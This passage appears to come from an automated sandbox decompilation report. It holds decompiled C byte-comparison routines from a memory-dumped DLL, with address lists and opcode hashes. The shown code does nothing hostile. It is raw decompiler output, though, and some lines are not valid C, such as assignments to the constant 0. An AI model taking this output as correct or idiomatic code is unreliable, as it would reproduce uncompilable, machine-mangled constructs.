                                            							if(_t200 ==  *(_t294 - 0x13)) {
                                            								_t246 = 0;
                                            								L47:
                                            								if(_t246 != 0) {
                                            									goto L1;
                                            								}
                                            								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
                                            									_t246 = 0;
                                            									L58:
                                            									if(_t246 != 0) {
                                            										goto L1;
                                            									}
                                            									_t202 =  *(_t336 - 0xb);
                                            									if(_t202 ==  *(_t294 - 0xb)) {
                                            										_t246 = 0;
                                            										L69:
                                            										if(_t246 != 0) {
                                            											goto L1;
                                            										}
                                            										_t203 =  *(_t336 - 7);
                                            										if(_t203 ==  *(_t294 - 7)) {
                                            											_t246 = 0;
                                            											L80:
                                            											if(_t246 != 0) {
                                            												goto L1;
                                            											}
                                            											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
                                            											if(_t297 == 0) {
                                            												L83:
                                            												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
                                            												if(_t299 == 0) {
                                            													L3:
                                            													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
                                            													if(_t246 != 0) {
                                            														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                            													}
                                            													goto L1;
                                            												}
                                            												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
                                            												if(_t246 != 0) {
                                            													goto L1;
                                            												} else {
                                            													goto L3;
                                            												}
                                            											}
                                            											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
                                            											if(_t246 != 0) {
                                            												goto L1;
                                            											}
                                            											goto L83;
                                            										}
                                            										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
                                            										if(_t301 == 0) {
                                            											L73:
                                            											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
                                            											if(_t303 == 0) {
                                            												L75:
                                            												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
                                            												if(_t305 == 0) {
                                            													L77:
                                            													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
                                            													if(_t246 != 0) {
                                            														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                            													}
                                            													goto L80;
                                            												}
                                            												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
                                            												if(_t246 != 0) {
                                            													goto L1;
                                            												}
                                            												goto L77;
                                            											}
                                            											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
                                            											if(_t246 != 0) {
                                            												goto L1;
                                            											}
                                            											goto L75;
                                            										}
                                            										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
                                            										if(_t246 != 0) {
                                            											goto L1;
                                            										}
                                            										goto L73;
                                            									}
                                            									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
                                            									if(_t307 == 0) {
                                            										L62:
                                            										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
                                            										if(_t309 == 0) {
                                            											L64:
                                            											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
                                            											if(_t311 == 0) {
                                            												L66:
                                            												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
                                            												if(_t246 != 0) {
                                            													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                            												}
                                            												goto L69;
                                            											}
                                            											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
                                            											if(_t246 != 0) {
                                            												goto L1;
                                            											}
                                            											goto L66;
                                            										}
                                            										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
                                            										if(_t246 != 0) {
                                            											goto L1;
                                            										}
                                            										goto L64;
                                            									}
                                            									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
                                            									if(_t246 != 0) {
                                            										goto L1;
                                            									}
                                            									goto L62;
                                            								}
                                            								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
                                            								if(_t313 == 0) {
                                            									L51:
                                            									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
                                            									if(_t315 == 0) {
                                            										L53:
                                            										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
                                            										if(_t317 == 0) {
                                            											L55:
                                            											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
                                            											if(_t246 != 0) {
                                            												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                            											}
                                            											goto L58;
                                            										}
                                            										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
                                            										if(_t246 != 0) {
                                            											goto L1;
                                            										}
                                            										goto L55;
                                            									}
                                            									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
                                            									if(_t246 != 0) {
                                            										goto L1;
                                            									}
                                            									goto L53;
                                            								}
                                            								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
                                            								if(_t246 != 0) {
                                            									goto L1;
                                            								}
                                            								goto L51;
                                            							}
                                            							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
                                            							if(_t319 == 0) {
                                            								L40:
                                            								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
                                            								if(_t321 == 0) {
                                            									L42:
                                            									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
                                            									if(_t323 == 0) {
                                            										L44:
                                            										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
                                            										if(_t246 != 0) {
                                            											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                            										}
                                            										goto L47;
                                            									}
                                            									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
                                            									if(_t246 != 0) {
                                            										goto L1;
                                            									}
                                            									goto L44;
                                            								}
                                            								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
                                            								if(_t246 != 0) {
                                            									goto L1;
                                            								}
                                            								goto L42;
                                            							}
                                            							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
                                            							if(_t246 != 0) {
                                            								goto L1;
                                            							}
                                            							goto L40;
                                            						}
                                            						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
                                            						if(_t325 == 0) {
                                            							L29:
                                            							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
                                            							if(_t327 == 0) {
                                            								L31:
                                            								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
                                            								if(_t329 == 0) {
                                            									L33:
                                            									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
                                            									if(_t246 != 0) {
                                            										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                            									}
                                            									goto L36;
                                            								}
                                            								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
                                            								if(_t246 != 0) {
                                            									goto L1;
                                            								}
                                            								goto L33;
                                            							}
                                            							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
                                            							if(_t246 != 0) {
                                            								goto L1;
                                            							}
                                            							goto L31;
                                            						}
                                            						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
                                            						if(_t246 != 0) {
                                            							goto L1;
                                            						}
                                            						goto L29;
                                            					}
                                            					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
                                            					if(_t331 == 0) {
                                            						L18:
                                            						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
                                            						if(_t333 == 0) {
                                            							L20:
                                            							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
                                            							if(_t335 == 0) {
                                            								L22:
                                            								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
                                            								if(_t246 != 0) {
                                            									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                            								}
                                            								goto L25;
                                            							}
                                            							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
                                            							if(_t246 != 0) {
                                            								goto L1;
                                            							}
                                            							goto L22;
                                            						}
                                            						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
                                            						if(_t246 != 0) {
                                            							goto L1;
                                            						}
                                            						goto L20;
                                            					}
                                            					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
                                            					if(_t246 != 0) {
                                            						goto L1;
                                            					}
                                            					goto L18;
                                            				} else {
                                            					__edi =  *(__esi - 0x1f) & 0x000000ff;
                                            					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
                                            					if(__edi == 0) {
                                            						L7:
                                            						__edi =  *(__esi - 0x1e) & 0x000000ff;
                                            						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                            						if(__edi == 0) {
                                            							L9:
                                            							__edi =  *(__esi - 0x1d) & 0x000000ff;
                                            							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                            							if(__edi == 0) {
                                            								L11:
                                            								__ecx =  *(__esi - 0x1c) & 0x000000ff;
                                            								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                            								if(__ecx != 0) {
                                            									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                            								}
                                            								goto L14;
                                            							}
                                            							0 = 0 | __edi > 0x00000000;
                                            							__ecx = (__edi > 0) * 2 != 1;
                                            							if((__edi > 0) * 2 != 1) {
                                            								goto L1;
                                            							}
                                            							goto L11;
                                            						}
                                            						0 = 0 | __edi > 0x00000000;
                                            						__ecx = (__edi > 0) * 2 != 1;
                                            						if((__edi > 0) * 2 != 1) {
                                            							goto L1;
                                            						}
                                            						goto L9;
                                            					}
                                            					0 = 0 | __edi > 0x00000000;
                                            					__ecx = (__edi > 0) * 2 != 1;
                                            					if((__edi > 0) * 2 != 1) {
                                            						goto L1;
                                            					}
                                            					goto L7;
                                            				}
                                            				L1:
                                            				_t197 = _t246;
                                            				return _t197;
                                            			}
































                                            0x10006b4f
                                            0x10006b67
                                            0x10006b67
                                            0x10006b6f
                                            0x10006b71
                                            0x10006b89
                                            0x10006b89
                                            0x10006b91
                                            0x10006b93
                                            0x10006b9c
                                            0x10006b9c
                                            0x00000000
                                            0x10006b93
                                            0x10006b77
                                            0x10006b7a
                                            0x10006b83
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006b83
                                            0x10006b55
                                            0x10006b58
                                            0x10006b61
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006b61
                                            0x10006b33
                                            0x10006b36
                                            0x10006b3f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006b3f
                                            0x100062a5
                                            0x100062a5
                                            0x10007096

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction ID: c22180dd41322938c5145983b595c2607b659793927d401415bf2d4ba45eef17
                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction Fuzzy Hash: 76C170722155930AFB5DCA79C83413FBAE2EB966F1327076DD4B2DB1C8EE20C564D620
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E100062AD(void* __edx, void* __esi) {
                                            				signed int _t184;
                                            				signed char _t185;
                                            				signed char _t186;
                                            				signed char _t187;
                                            				signed char _t188;
                                            				signed char _t190;
                                            				signed int _t231;
                                            				void* _t275;
                                            				void* _t278;
                                            				void* _t280;
                                            				void* _t282;
                                            				void* _t284;
                                            				void* _t286;
                                            				void* _t288;
                                            				void* _t290;
                                            				void* _t292;
                                            				void* _t294;
                                            				void* _t296;
                                            				void* _t298;
                                            				void* _t300;
                                            				void* _t302;
                                            				void* _t304;
                                            				void* _t306;
                                            				void* _t308;
                                            				void* _t310;
                                            				void* _t312;
                                            				void* _t313;
                                            
                                            				_t313 = __esi;
                                            				_t275 = __edx;
                                            				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
                                            					_t231 = 0;
                                            					L11:
                                            					if(_t231 != 0) {
                                            						goto L1;
                                            					}
                                            					_t185 =  *(_t313 - 0x19);
                                            					if(_t185 ==  *(_t275 - 0x19)) {
                                            						_t231 = 0;
                                            						L22:
                                            						if(_t231 != 0) {
                                            							goto L1;
                                            						}
                                            						_t186 =  *(_t313 - 0x15);
                                            						if(_t186 ==  *(_t275 - 0x15)) {
                                            							_t231 = 0;
                                            							L33:
                                            							if(_t231 != 0) {
                                            								goto L1;
                                            							}
                                            							_t187 =  *(_t313 - 0x11);
                                            							if(_t187 ==  *(_t275 - 0x11)) {
                                            								_t231 = 0;
                                            								L44:
                                            								if(_t231 != 0) {
                                            									goto L1;
                                            								}
                                            								_t188 =  *(_t313 - 0xd);
                                            								if(_t188 ==  *(_t275 - 0xd)) {
                                            									_t231 = 0;
                                            									L55:
                                            									if(_t231 != 0) {
                                            										goto L1;
                                            									}
                                            									if( *(_t313 - 9) ==  *(_t275 - 9)) {
                                            										_t231 = 0;
                                            										L66:
                                            										if(_t231 != 0) {
                                            											goto L1;
                                            										}
                                            										_t190 =  *(_t313 - 5);
                                            										if(_t190 ==  *(_t275 - 5)) {
                                            											_t231 = 0;
                                            											L77:
                                            											if(_t231 == 0) {
                                            												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
                                            												if(_t231 != 0) {
                                            													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                            												}
                                            											}
                                            											goto L1;
                                            										}
                                            										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
                                            										if(_t278 == 0) {
                                            											L70:
                                            											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
                                            											if(_t280 == 0) {
                                            												L72:
                                            												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
                                            												if(_t282 == 0) {
                                            													L74:
                                            													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
                                            													if(_t231 != 0) {
                                            														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                            													}
                                            													goto L77;
                                            												}
                                            												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
                                            												if(_t231 != 0) {
                                            													goto L1;
                                            												}
                                            												goto L74;
                                            											}
                                            											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
                                            											if(_t231 != 0) {
                                            												goto L1;
                                            											}
                                            											goto L72;
                                            										}
                                            										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
                                            										if(_t231 != 0) {
                                            											goto L1;
                                            										}
                                            										goto L70;
                                            									}
                                            									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
                                            									if(_t284 == 0) {
                                            										L59:
                                            										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
                                            										if(_t286 == 0) {
                                            											L61:
                                            											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
                                            											if(_t288 == 0) {
                                            												L63:
                                            												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
                                            												if(_t231 != 0) {
                                            													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                            												}
                                            												goto L66;
                                            											}
                                            											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
                                            											if(_t231 != 0) {
                                            												goto L1;
                                            											}
                                            											goto L63;
                                            										}
                                            										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
                                            										if(_t231 != 0) {
                                            											goto L1;
                                            										}
                                            										goto L61;
                                            									}
                                            									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
                                            									if(_t231 != 0) {
                                            										goto L1;
                                            									}
                                            									goto L59;
                                            								}
                                            								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
                                            								if(_t290 == 0) {
                                            									L48:
                                            									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
                                            									if(_t292 == 0) {
                                            										L50:
                                            										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
                                            										if(_t294 == 0) {
                                            											L52:
                                            											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
                                            											if(_t231 != 0) {
                                            												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                            											}
                                            											goto L55;
                                            										}
                                            										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
                                            										if(_t231 != 0) {
                                            											goto L1;
                                            										}
                                            										goto L52;
                                            									}
                                            									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
                                            									if(_t231 != 0) {
                                            										goto L1;
                                            									}
                                            									goto L50;
                                            								}
                                            								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
                                            								if(_t231 != 0) {
                                            									goto L1;
                                            								}
                                            								goto L48;
                                            							}
                                            							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
                                            							if(_t296 == 0) {
                                            								L37:
                                            								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
                                            								if(_t298 == 0) {
                                            									L39:
                                            									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
                                            									if(_t300 == 0) {
                                            										L41:
                                            										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
                                            										if(_t231 != 0) {
                                            											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                            										}
                                            										goto L44;
                                            									}
                                            									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
                                            									if(_t231 != 0) {
                                            										goto L1;
                                            									}
                                            									goto L41;
                                            								}
                                            								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
                                            								if(_t231 != 0) {
                                            									goto L1;
                                            								}
                                            								goto L39;
                                            							}
                                            							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
                                            							if(_t231 != 0) {
                                            								goto L1;
                                            							}
                                            							goto L37;
                                            						}
                                            						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
                                            						if(_t302 == 0) {
                                            							L26:
                                            							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
                                            							if(_t304 == 0) {
                                            								L28:
                                            								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
                                            								if(_t306 == 0) {
                                            									L30:
                                            									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
                                            									if(_t231 != 0) {
                                            										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                            									}
                                            									goto L33;
                                            								}
                                            								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
                                            								if(_t231 != 0) {
                                            									goto L1;
                                            								}
                                            								goto L30;
                                            							}
                                            							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
                                            							if(_t231 != 0) {
                                            								goto L1;
                                            							}
                                            							goto L28;
                                            						}
                                            						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
                                            						if(_t231 != 0) {
                                            							goto L1;
                                            						}
                                            						goto L26;
                                            					}
                                            					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
                                            					if(_t308 == 0) {
                                            						L15:
                                            						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
                                            						if(_t310 == 0) {
                                            							L17:
                                            							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
                                            							if(_t312 == 0) {
                                            								L19:
                                            								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
                                            								if(_t231 != 0) {
                                            									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                            								}
                                            								goto L22;
                                            							}
                                            							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
                                            							if(_t231 != 0) {
                                            								goto L1;
                                            							}
                                            							goto L19;
                                            						}
                                            						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
                                            						if(_t231 != 0) {
                                            							goto L1;
                                            						}
                                            						goto L17;
                                            					}
                                            					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
                                            					if(_t231 != 0) {
                                            						goto L1;
                                            					}
                                            					goto L15;
                                            				} else {
                                            					__edi = __al & 0x000000ff;
                                            					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                            					if(__edi == 0) {
                                            						L4:
                                            						__edi =  *(__esi - 0x1c) & 0x000000ff;
                                            						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                            						if(__edi == 0) {
                                            							L6:
                                            							__edi =  *(__esi - 0x1b) & 0x000000ff;
                                            							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                            							if(__edi == 0) {
                                            								L8:
                                            								__ecx =  *(__esi - 0x1a) & 0x000000ff;
                                            								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
                                            								if(__ecx != 0) {
                                            									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                            								}
                                            								goto L11;
                                            							}
                                            							0 = 0 | __edi > 0x00000000;
                                            							__ecx = (__edi > 0) * 2 != 1;
                                            							if((__edi > 0) * 2 != 1) {
                                            								goto L1;
                                            							}
                                            							goto L8;
                                            						}
                                            						0 = 0 | __edi > 0x00000000;
                                            						__ecx = (__edi > 0) * 2 != 1;
                                            						if((__edi > 0) * 2 != 1) {
                                            							goto L1;
                                            						}
                                            						goto L6;
                                            					}
                                            					0 = 0 | __edi > 0x00000000;
                                            					__ecx = (__edi > 0) * 2 != 1;
                                            					if((__edi > 0) * 2 != 1) {
                                            						goto L1;
                                            					}
                                            					goto L4;
                                            				}
                                            				L1:
                                            				_t184 = _t231;
                                            				return _t184;
                                            			}






























                                            0x100065e8
                                            0x100065ea
                                            0x10006602
                                            0x1000660a
                                            0x1000660c
                                            0x10006615
                                            0x10006615
                                            0x00000000
                                            0x1000660c
                                            0x100065f3
                                            0x100065fc
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100065fc
                                            0x100065d1
                                            0x100065da
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100065da
                                            0x100065af
                                            0x100065b8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100065b8
                                            0x1000650c
                                            0x1000650e
                                            0x10006526
                                            0x1000652e
                                            0x10006530
                                            0x10006548
                                            0x10006550
                                            0x10006552
                                            0x1000656a
                                            0x10006572
                                            0x10006574
                                            0x1000657d
                                            0x1000657d
                                            0x00000000
                                            0x10006574
                                            0x1000655b
                                            0x10006564
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006564
                                            0x10006539
                                            0x10006542
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006542
                                            0x10006517
                                            0x10006520
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006520
                                            0x10006475
                                            0x10006477
                                            0x1000648f
                                            0x10006497
                                            0x10006499
                                            0x100064b1
                                            0x100064b9
                                            0x100064bb
                                            0x100064d3
                                            0x100064db
                                            0x100064dd
                                            0x100064e6
                                            0x100064e6
                                            0x00000000
                                            0x100064dd
                                            0x100064c4
                                            0x100064cd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100064cd
                                            0x100064a2
                                            0x100064ab
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100064ab
                                            0x10006480
                                            0x10006489
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006489
                                            0x100063de
                                            0x100063e0
                                            0x100063f8
                                            0x10006400
                                            0x10006402
                                            0x1000641a
                                            0x10006422
                                            0x10006424
                                            0x1000643c
                                            0x10006444
                                            0x10006446
                                            0x1000644f
                                            0x1000644f
                                            0x00000000
                                            0x10006446
                                            0x1000642d
                                            0x10006436
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006436
                                            0x1000640b
                                            0x10006414
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006414
                                            0x100063e9
                                            0x100063f2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100063f2
                                            0x10006347
                                            0x10006349
                                            0x10006361
                                            0x10006369
                                            0x1000636b
                                            0x10006383
                                            0x1000638b
                                            0x1000638d
                                            0x100063a5
                                            0x100063ad
                                            0x100063af
                                            0x100063b8
                                            0x100063b8
                                            0x00000000
                                            0x100063af
                                            0x10006396
                                            0x1000639f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000639f
                                            0x10006374
                                            0x1000637d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000637d
                                            0x10006352
                                            0x1000635b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100062b5
                                            0x100062b5
                                            0x100062bc
                                            0x100062be
                                            0x100062d2
                                            0x100062d2
                                            0x100062da
                                            0x100062dc
                                            0x100062f0
                                            0x100062f0
                                            0x100062f8
                                            0x100062fa
                                            0x1000630e
                                            0x1000630e
                                            0x10006316
                                            0x10006318
                                            0x10006321
                                            0x10006321
                                            0x00000000
                                            0x10006318
                                            0x10006300
                                            0x10006303
                                            0x1000630c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000630c
                                            0x100062e2
                                            0x100062e5
                                            0x100062ee
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100062ee
                                            0x100062c4
                                            0x100062c7
                                            0x100062d0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100062d0
                                            0x100062a5
                                            0x100062a5
                                            0x10007096

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                            • Instruction ID: f98c86527ad7a144efb2675a7ed10b3c8958d79e2d9031d2d4aabe74ee8549b4
                                            • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                            • Instruction Fuzzy Hash: BAC173722055930AFF4DCA798C3413FBAE2EB966F1327176DD8B2DB1C9EE10C5649620
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E10005E95(void* __edx, void* __esi) {
                                            				signed char _t177;
                                            				void* _t178;
                                            				signed char _t179;
                                            				signed char _t180;
                                            				signed char _t181;
                                            				signed char _t183;
                                            				signed char _t184;
                                            				void* _t228;
                                            				void* _t278;
                                            				void* _t281;
                                            				void* _t283;
                                            				void* _t285;
                                            				void* _t287;
                                            				void* _t289;
                                            				void* _t291;
                                            				void* _t293;
                                            				void* _t295;
                                            				void* _t297;
                                            				void* _t299;
                                            				void* _t301;
                                            				void* _t303;
                                            				void* _t305;
                                            				void* _t307;
                                            				void* _t309;
                                            				void* _t311;
                                            				void* _t313;
                                            				void* _t315;
                                            				void* _t317;
                                            				void* _t319;
                                            				void* _t321;
                                            				void* _t322;
                                            
                                            				_t322 = __esi;
                                            				_t278 = __edx;
                                            				_t177 =  *(__esi - 0x1c);
                                            				if(_t177 ==  *(__edx - 0x1c)) {
                                            					_t228 = 0;
                                            					L10:
                                            					if(_t228 != 0) {
                                            						L78:
                                            						_t178 = _t228;
                                            						return _t178;
                                            					}
                                            					_t179 =  *(_t322 - 0x18);
                                            					if(_t179 ==  *(_t278 - 0x18)) {
                                            						_t228 = 0;
                                            						L21:
                                            						if(_t228 != 0) {
                                            							goto L78;
                                            						}
                                            						_t180 =  *(_t322 - 0x14);
                                            						if(_t180 ==  *(_t278 - 0x14)) {
